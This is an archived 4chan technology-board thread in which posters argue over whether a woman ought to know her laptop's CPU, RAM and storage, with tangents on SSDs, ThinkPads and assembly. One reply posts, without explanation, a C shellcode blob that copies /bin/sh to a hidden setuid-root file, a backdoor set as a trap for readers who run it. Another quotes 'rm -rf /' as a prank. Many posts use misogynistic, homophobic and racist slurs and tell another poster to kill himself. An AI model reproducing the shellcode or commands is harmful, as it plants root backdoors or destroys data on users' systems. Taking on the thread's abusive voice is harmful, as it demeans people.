[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

>self proclaimed 'nerd' female friend buys new laptop

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 101
Thread images: 9

File: 1451249730974.jpg (94KB, 700x507px) Image search: [Google]
1451249730974.jpg
94KB, 700x507px
>one of those Dell latitudes for college, looks pretty great
>doesn't know what CPU it has
>doesn't know how much RAM it has
>doesn't know what HDD it has
>doesn't know the screen resolution even
>laughs about it, she just bought what the guy at best buy recommended her

Now I'm not saying people are supposed to know x86 assembly, or even programming at all but why is it so socially acceptable to be so ignorant about tech? Would it hurt if people just googled whatever they don't know instead of being proud of that they don't know?
>>
File: 1451643663995.jpg (436KB, 1200x720px) Image search: [Google]
1451643663995.jpg
436KB, 1200x720px
>>52666579
Its cuz ur a faget and a cuck
>>
>laugh about it

Is she hiding her power level? Dell latitude is really good leltop though better than chinkpad.
>>
Why don't you tell your friends on Reddit about it?
>>
Knowing anything about anything means you're a fucking permavirgin nerd, get with the fucking times OP.
>>
>>52666579
Hello >>>/soc/
Now GTFO.
>>
>>52666579
Nice blog post
>googled
triggered
>>
>>52666630
source
>>
>>52666579
I regret buying a Dell Inspiron despite knowing the specs. This was before I browsed /g/.
>i7 4510U
>GT 750M
>16GB RAM
>1 TB HDD
>1920x1080, 15.6"
>>
>>52666579

She's a keeper
>>
>>52667242
What's wrong with those specs
>>
There's nothing you can do about it, the most effective thing you can do is not shit up message boards with green stories.
>>
>>52667652
>>52667242
The lack of SSD is suprising in such a powerful laptop. Also the i7-U processor is the Intels new way to sell i3 CPUs as fancy fucking shit.
>>
>>52666579
>average person has average knowledge about technology
>Why is it so socially acceptable for average people to know less about technology than me?
Because they are average? /g/ IS the technology board. Just by coming here, you already demonstrate how much more interested in technology you are, when compared to the average person.

Compare /g/'s traffic to /v/.

Or /a/.

Or even /sp/!
>>
>>52667869
That really depends on the price he paid for it
>no SSD
Meme technology
>>
Atleast she got a Dell Latitude. Thats not consumer grade, thats business grade
>>
>>52667869
I don't know why they do this. WHY WOULD THEY MAKE A DUAL CORE I7 LIKE LITERALLY WTF
>>
>>52667975
>ssd is meme
How the hell a super high IO rate, no moving violatile parts, and no goddamn noise is a fucking meme? What does people use for laptops?
>>
>>52668268
Possibly the other cores broke during production so they sell it as dual core.
>>
Some people really just use them as tools.

Not all nerds are computer nerds, OP.
>>
>>52668347
Because SSD make everything faster. Having a fast computer is a meme. Waiting for the HDD to speed up is part of the charm.
>>
File: 01.png (732KB, 566x960px) Image search: [Google]
01.png
732KB, 566x960px
>>52666579
Riddle me this, OP: Why is it so socially acceptable to be an ignorant fuck on the internet who complains about friends behind their back and calls them ignorant at the same time?
Also,
>x86 assembly.
Wow, just wow. You didn't even get THAT right.
>>
>>52666579
>Would it hurt if people just googled whatever they don't know
That wouldn't help at all. You need to understand what's written there and that needs a bit of technical aptitude plus somewhat reasonable intelligence. If you're not intelligent enough to pick it naturally and/or not naturally inclined towards it then you won't know it. Otherwise she would already know all those parameters.
This shouldn't upset you, this is how the universe works. Deal with it or die like the rest.
>>
>>52666579
you are fucking retarded.
Jesus some people are self entitled fucks
>>
>Now I'm not saying people are supposed to know x86 assembly

And you shouldn't be. Unless you are writing a compiler or some shit, just learn a real fucking language. Nobody is smarter than a compiler.
>>
>>52668750
Average industry "expert" opinion almost like out of college. Only spent 5 years in some shitty position thinking he's the shit.
(Or bait.)
>>
>>52667912
>not doing a little research about something you are going to spend a considerable amount of money on is acceptable

Not op but
>>
It's socially acceptable to be ignorant about science and technology.
>>
>>52666579
I have no idea but this shit pisses me off.

It's like not knowing what kind of car you drive to work every day.
>>
>>52666579

What the fuck do you care?
>>
>>52666630
>>52666707
>>52666731

lol, newfags
>>
>>52666579
>female friend
>friend

You don't sound very much like a friend to me.

To be honest, it just sounds like you're mad that you're too socially inept to talk about anything with her besides computers, and you are venting your frustration that she just didn't care. You aren't going to impress women with your consumer tech "knowledge" and unwarranted sense of self-importance.
>>
>>52669008
this
this
this
this
>>
File: 4L_sflPaDV0.jpg (37KB, 720x480px) Image search: [Google]
4L_sflPaDV0.jpg
37KB, 720x480px
>>52666579
>2016
>being "just friends" with a female
>getting this cucked
Stop wasting your time being a creepy beta male orbiter with this slut. It's obvious she sucked the best buy guy's cock and he gave her the special whore discount. Pic related, it's you
>>
>>52666690
Please neck yourself you autistic cumstain
Nobody in real life laughs because they're hiding something
Stop watching anime you weeaboo degenerate trash
>>
>>52666690
Thinkpads always have and always will be god tier
>>
Sounds like you never had a girl before.
>>
none of these things matter though.
RAM limits are not important unless you are close to using the limit of that.
CPU model is irrelevant although it is nice to know the clock speed and the number of threads.
HDD space is important when you reach the limits, most normal people reach the limit unless they stream everything.

Being proud about not knowing stuff is weird though.
But I can see a situation where these things are not important.

Even if you make applications, knowing about the system is often irrelevant unless you are making embedded systems.
>>
>>52668268
4 threads is just as good as 4 cores.
>>
File: goodbye4chan.jpg (52KB, 604x604px) Image search: [Google]
goodbye4chan.jpg
52KB, 604x604px
>>52669008
Thanks for repeating what I said before anon, you put it in a more user-friendly readable way.
>>52668608
I feel content with OP's stupid behaviour in that he gets nothing more than hate acting the way he does and being dumb enough to post it on 4chan. In the real-world he'd just been another "ignore that dumbshit" in the eyes of others, but he'll never know as he was going to be ignored. Here he gets told what a sore fucking loser cuntass bitch motherfucker mongoloid he is when acting like this, so in some way we educated and raise ppl better than most of the real-world situations ever could.
I'm actually somewhat proud of this cesspool here right now, what better way to part and never come visit again. Bye anons have a great time and see you in real-life when you're ready for it.
>>
>>52669314
No. No it isn't.
>>
>>52669097
> implying chiclet keyboard isn't total crap!
>>
>>52668268
Because i7s have 2mb of l3 per core, everything else has 1.5mb per core.

So a dual core i7 has 1mb more l3 than an i3 or i5.

Desktop i3s only have 3mb total.

You are wrong
>>
>>self proclaimed 'neckbeard' goes for checkup
>>one of those fat smelly NEETs not even in college, looks pretty disgusting
>>doesn't know he's unhealthy
>>doesn't know how much fat he has
>>doesn't know what sugar s are
>>doesn't know the bmi even
>>laughs about it, he just ate what the guy at McDonald's recommended him
>Now I'm not saying people are supposed to know brain surgery, or even cpr at all but why is it so socially acceptable to be so ignorant about health? Would it hurt if people just googled whatever they don't know instead of being proud of that they don't know?
>>
>>52668750
x86 assembly is also useful if you're writing a dynarec emulator. Assembly is usually very useful in embedded systems as well.
>>
>>52669060
>Stop wasting your time being a creepy beta male orbiter with this slut
stop prohecting anon
>>
>>52669072
>Nobody in real life laughs because they're hiding something

not true btw
>>
>>52666690
DON'T YOU DARE COMPARE THOSE SHITTY DELLS TO THE MIGHTY THINKPADS
>>
>>52670305
>x86
>embedded
>80W TDP
lol
>>
>>52670244
>bmi
>using this figure
americunt (as in dumb shit) detected
>>
>>52669072
You can't possibly believe this.
>>
>>52670244
>Being a white knight faggot on this level
>Any point in space and time
I guess this is what we've come to as a society... A time when being a complete idiot and not doing any kind of thinking is not only considered acceptable, but also defended by people whenever it's questioned. A time when writing "#ResistCapitalism" on the back of your iPhone and taking a selfie of yourself in a mirror is considered the standard anti-establishment thing to do.
>>
>>52666579
>obnoxious "nerd" guy comes up to me and wants to talk about his latest build that he has planned
>asks me about the specs of my laptop
>he literally does this every week
>I don't fucking know what CPU I have in there because I bought it 2 years ago and haven't needed to know since
suck my dick, I'm not memorizing shit I don't need to know to up my "nerd cred" or whateverthefuck
>>
>>52666579

You heard wrong autist. She's obviously not.
>>
>>52666579
It's acceptable because people make tons of money of ignorant buyers.

People buy 1800 dollar computers all the time for university when they only needed a chromebook.
>>
>>52667912
>I'm going to spend over a thousand bucks on something
>I won't do any simple research
>>
>>52671768
Holy shit having basic info about your daily use machine isn't that fucking hard. It's not 'nerd cred' either as you put it, it's just simple info that you can be expected to have if you own a machine.
And if remembering your CPU name requires "memorization", someone obviously is suffering from Alzheimers
>>
>>52674138
i7-4800MQ
This is like the first time that I have even bothered to look it up after making my decision to purchase this laptop. Why the fuck would I still have to have that present in my mind?
>>
>>52666579
>but why is it so socially acceptable to be so ignorant about tech?
But you're ignorant too anon.
Do you think you could tell the specs of a laptop, apart from screen, by just using it?

Cause that/s what she does, she just uses it.
>>
>>52674298
I agree that beyond having autism you don't need to know the specs to use the machine for most things. But when you're buying you should probably look into it tbqh.
>>
File: backtoreddit.jpg (134KB, 500x614px) Image search: [Google]
backtoreddit.jpg
134KB, 500x614px
>>52674298
>Go out and buy a piece of tech where the specs can have a significant impact on the experience of using said piece of tech
>Can't be bothered to do any kind of research on the subject ether before purchase or after purchase
>Just buy what the clerk suggests and pay what he asks for
Good grief at the close to half dozen white knight faggots in this thread defending her. Picture related is really all I can respond to this faggotry.
>>
File: image_3.jpg (81KB, 259x383px) Image search: [Google]
image_3.jpg
81KB, 259x383px
>>52669283
>CPU model is irrelevant
>>
>>52668889
I drive a Hyundai :D
>>
>>52667227
>>52666630
http://www.dlsite.com/maniax/announce/=/product_id/RJ156210
>>
Honestly though, I live in a shit-world country and I want to get a $300 ThinkPad that would be able to run an Android emulator for Development, Blender and some games.

Which one should I get, and how?
>>
>>52670244
This is perfectly valid reasoning and I agree 100% with it.
>>
>>52666579
You seem upset.
>>
>>52666579

forgive poor English

>discussing laptop components with a guy in university (Engineering)
>"so anon I want to buy more ram for my pc since WM eats so much"
>"I see, how much do you have already?"
>"4gig"
>"assuming you have ddr3 just get another 4 gig module, they are very cheap on ebay"
>he search a little on ebay with his phone
>"It's this good anon?"
>low profile DIMM module for desktops
>"you don't really know how to do this right?, just install speccy and search for you motherboard code, you will find on google how much ram it can handle, then write down your ram spec and search the same, if with similar frequencies it will be good as well they auto adjust"

next day

>"anon I found some, but they are all with half the frequencies"
>"Double Data Rate, you double that value"

next day

>"Ordered this, (4 gb)"
>"good, next week you will tell me if your system does better"

next week

>"so?"
>"not good anon, I had to mail it back"
>what, why?"
>"when I went to install then, I discovered my motherboard had only one ram slot"
>>
>>52675152
At least he learned something meaningful.
And to be honest, these things aren't exactly common knowledge, you shouldn't expect even those who are above average to know these kinds of things.
>>
I'm sick of seeing threads like this on /g/

WHY THE FUCK DO YOU CARE?

Let her buy whatever laptop she wants. Do you think if you convince her to buy a second-hand THinkPad from eBay and install Arch Linux fot her, she'll be so greatful that she'll suck your dick?
>>
OP are you some kind of butt hurt loser?
>>
>>52675152
wait a moment

amazon .... a-m-a-z-o-n
>>
>>52675557
it's not wordfiltered, guess I have brain tumor?
>>
>>52675322
not op but it's annoying as fuck when someone who doesn't know fuck all claims to be a nerd

also why do you care why he cares?
>>
>>52669072
>somebody buys an iMac
>I suppress the urge to rip his guts out and scream about how big of a ripoff those things are
>"hehe, yes it's a pretty machine indeed"
And that's how I'm no longer a social outcast.
>>
File: 1453765197940.gif (126KB, 720x480px) Image search: [Google]
1453765197940.gif
126KB, 720x480px
>>52668956
>newfags
>is newfag
>>
>>52668688
>Autist detected
>>
>>52666579
I don't even know how to change my own oil. I mean, I have a general idea of what is involved, but I don't have enough faith to do it myself.
>>
>>52666579
Do you know what the gear ratios are, or what sized oil filter your car uses?

Do you know what model compressor your fridge has?

What about the wire gauge used in the different divisions of your home?

The pitch of the screws used in your sofa?

Do you even know what kind of ram your phone uses?

You see, it is impossible for people to know everything.

So 99% of the world concentrate on information that will make a difference to them, in the way they are living their lives.

The other 1% just shitpost.
>>
>>52676417
/thread

char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
>>
>>52676417
if i owned a home a i would know all of these things
>>
>>52676361
So some faggot raging about a woman not knowing her computer's specs is not an autist, but someone who tells him that "That's how it is." is an autist?
>>
>>52666690
>Comparing dell to thinkpad

You get a dell and then the mobo and hard drive fail within 2 years, even if you are careful with it.

There's a reason colleges with leased computers as part of tuition use dell. The parts are garbage and they make up for it with economies of scale.
>>
>>52676799
nice dubs

>While reading a website called 4chan/b/ someone posted this code snippet
>rm -rf /
lol

https://security.stackexchange.com/questions/75873/what-does-this-potentially-malicious-code-do
>>
>>52666579
>shitposter about a "friend" on the internet

You put your improper quotation marks around the wrong word you fag
>>
>>52666579
You know they are many types of nerds, right?

>Tabletop games nerds
>TCG nerds
>RPG nerds
>Book nerds
>Art nerds

If she's not a tech nerd, welp. I'll be here to read when you post from your chinkpad all those >tfw no gf threads.
>>
>>52676799
you forgot your null terminator anon, now I'm just reading garbage...
>>
>>52676417
my phone uses lpddr3
>>
>>52670244
stop oppressing me with your healthism, shitlord
>>
>>52666579
>female

Oh. I see.
>>
>>52668816

>Average industry "expert" opinion

I am not claiming to be an expert on anything, you must have some strong legs from jumping to all these conclusions.

Mine is just the opinion of people who want to write software that's maintainable, readable, portable, and writable in a practical timespan. Assembly code is precisely none of these things.

>"oh, I want this software to run natively on <architecture> now?"
>C: install a toolchain perhaps, run a slightly different compile command
>ASM: rewrite the entire fucking thing, from scratch, in a completely different language to boot

If anything, it's people who needlessly write software entirely in assembly who are arrogant. They're the ones who think they're smarter than a compiler, don't care about people who want to use their software on a different architecture, and don't care about people who want to read or contribute to the code.

Mind you, I don't take issue with writing something in C, compiling it, then applying your own optimizations if you see a serious need and portability to other architectures isn't important.

>>52670305

>Assembly is usually very useful in embedded systems as well.

I'm very much aware, but x86 assembly? Not really. Learn ARM or something that's actually practical to write. Just look at this bullshit:

https://en.wikipedia.org/wiki/X86_instruction_listings

If you're unfortunate enough to find yourself writing embedded x86 code, save yourself the hassle and just write it in C.
>>
>>52677077
>everything is shit because I used a walmart vomit box
my Precision T7400 is on its 8th year of service
my Precision 450 is on its 12th year of servce
my Dimension XPS/P133c is on its 21st year of service

the low end of anything is going to be shit, the high end of anything is probably going to be good
>>
>>52666630
It's so that folks like us can get laid
>>
>>52682836
>Mine is just the opinion of people who want to write software that's maintainable, readable, portable, and writable in a practical timespan. Assembly code is precisely none of these things.
The main point of assembly is not to write code in it . It's useful to know so you know what kind of abstractions exist at that level and what your program will compile to. So you will know when something is probably very badly optimized. You can do profiling better by understanding what is going on.
>>
Partially related, it always irked me how content creators (streamers, reviewers, etc) who aren't making shit tons of money but enough to live know barely anything about tech.

I mean, sometimes you get one who actually built their own computer. They seem alright. But for all the editing and equipment used to produce a professional show, and it be a one-man operation, you would think they would learn SOMETHING about how this stuff works.
>>
>>52666707
Says the tripfag.
>>
>>52668347
I'd rather have a 1TB HDD than a 128GB SSD anytime
>>
>>52683952
why not have both you poorfag
>>
>>52676417
No, but I don't act like I know any of it either
the girl in OP acts like she knows her shit when she doesn't
>>
>>52666707
>Be me, valf !0NOa6Po8/2
>Watch niggers fuck my GF all day
>Enjoy it
>Proceed to fuck nigggers until my ass bursts
>At least I'm a tripfag
>>
>>52683952
>Implying all that every SSD is 128gb.
M E M E
E M E M
M E M E
E M E M
Thread posts: 101
Thread images: 9

[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/

If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.